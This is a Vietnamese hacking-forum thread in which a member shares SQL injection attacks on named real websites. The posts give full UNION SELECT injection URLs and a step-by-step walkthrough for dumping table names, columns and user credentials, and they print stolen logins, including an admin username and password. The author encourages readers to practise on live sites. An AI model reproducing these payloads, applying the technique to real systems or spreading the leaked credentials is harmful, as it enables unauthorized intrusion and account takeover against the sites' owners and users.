| share anh em 1 site đã đc chiếm | |
| | Tác giả | Thông điệp |
---|
Dân Phòng thượng sĩ
Tổng số bài gửi : 109 Join date : 02/08/2011 Age : 34 Đến từ : Oriflame - Group Passion
| Tiêu đề: share anh em 1 site đã đc chiếm August 4th 2011, 14:27 | |
| http://www.dibiuk.com/product_details.php?product_id=-12 UNION SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- | |
| | | Admin Admin
Tổng số bài gửi : 119 Join date : 24/07/2010 Age : 63 Đến từ : TP.HCM
| Tiêu đề: Re: share anh em 1 site đã đc chiếm August 5th 2011, 02:05 | |
| - Em vui lòng chỉ dẫn cách thức hack để mọi người thưởng thức. - Thấy trang thầy Tặng hôm bị tấn công, admin nghi rằng kẻ tấn công lợi dụng lỗi mã nguồn của cbox, từ đó đưa 1 hình ảnh có chứa mã nguồn độc vào............ tấn công. Không biết có phải như vậy không, ai biết phân tích coi?? | |
| | | Dân Phòng thượng sĩ
Tổng số bài gửi : 109 Join date : 02/08/2011 Age : 34 Đến từ : Oriflame - Group Passion
| Tiêu đề: Re: share anh em 1 site đã đc chiếm August 5th 2011, 17:11 | |
| http://www.dibiuk.com/product_details.php?product_id=-12 "id=-12" là lỗi mà em tìm đc = cách thử. Sau đây em xin lấy 1 VD để giải cho Admin và các Mem cùng hiểu và thực hành ngay trên vd của em. Em xin phép dùng từ "Ta" để nói chung VD: web "http://www.whamster.com/viewProduct.php?ID=485"có "id=485" thử "id=485' " nó hiện ra thế này "Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sites/whamster.com/public_html/viewProduct.php" vậy là dính lỗi. + Ta dựa vào lỗi đó tìm Order như sau: "http://www.whamster.com/viewProduct.php?ID=485 oder by 1-- -" (tùy chọn order by ??-- -)ta phát hiện đc 28 cột và số cột lỗi nằm ở vị trí 18-14. Chọn đại 1 trong 2 số đó. Ta chọn số 14. + Tìm version trước:"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13, version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -" Version tìm đc: 5.1.56+ Ta tìm tiếp theo là database:"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13, group_concat(table_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.tables where table_schema=database()-- - Khi Enter bước này Site sẽ xuất ra các USERS. Nhìu quá chọn đại đi há users vậy + Tiếp theo ta tìm Column như sau: "http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat( column_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema. columns where table_ name=0x7573657273-- -". Như đã nói trên ta Down hackbar addon từ gu gồ nhé."0xusers = 0x7573657273".Bôi đen users ở dòng 0xusers chọn trên thanh hackbar Encoding->Hex Encoding->String to 00ff00ffKhi Enter xong bước này thì ta có đc CSDL như sau:"ID,Username,Password,Level,Author,Email" + Ta chọn "Username,Password" "http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat( Username,0x7c,Password),15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users-- -" Lấy users nào thì trả về from đúng như thế+ Cuối cùng kết quả ta thu đc là: steveb|Whamskiff49Đây là ví dụ nhé. Tài khoản đó đã bị đổi Pass rồi. Hack để học hỏi chứ ko nên phá nhé Nếu trình bày thế mọi người k hiểu thì cứ hỏi nhé. | |
| | | Dân Phòng thượng sĩ
Tổng số bài gửi : 109 Join date : 02/08/2011 Age : 34 Đến từ : Oriflame - Group Passion
| Tiêu đề: Re: share anh em 1 site đã đc chiếm August 5th 2011, 17:30 | |
| Trong lúc trình bày còn nhiều thiếu sót k lường trước đc nên MOD mong các Mem và Admin thứ lỗi và bổ sung cho MOD nhé. Rất cám ơn sự ủng hộ của Admin và các Mem Còn bây giờ hãy lao vào thực hành cho thuần thục nhé. Đó là những chiêu cơ bản thôi. | |
| | | Dân Phòng thượng sĩ
Tổng số bài gửi : 109 Join date : 02/08/2011 Age : 34 Đến từ : Oriflame - Group Passion
| Tiêu đề: Re: share anh em 1 site đã đc chiếm August 5th 2011, 17:34 | |
| | |
| | | Dân Phòng thượng sĩ
Tổng số bài gửi : 109 Join date : 02/08/2011 Age : 34 Đến từ : Oriflame - Group Passion
| Tiêu đề: Re: share anh em 1 site đã đc chiếm August 6th 2011, 04:40 | |
| http://www.dibiuk.com/product_details.php?product_id=-12 UNION SELECT 1,2,3,4,5,6,7,group_concat( user_name,0x7c,user_password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from cycleshopnew_admin-- - ID: Admin Pass: limlom72 | |
| | | Sponsored content
| Tiêu đề: Re: share anh em 1 site đã đc chiếm | |
| |
| | | | share anh em 1 site đã đc chiếm | |
|
Trang 1 trong tổng số 1 trang | |
Similar topics | |
|
| Permissions in this forum: | Bạn không có quyền trả lời bài viết
| |
| |
| |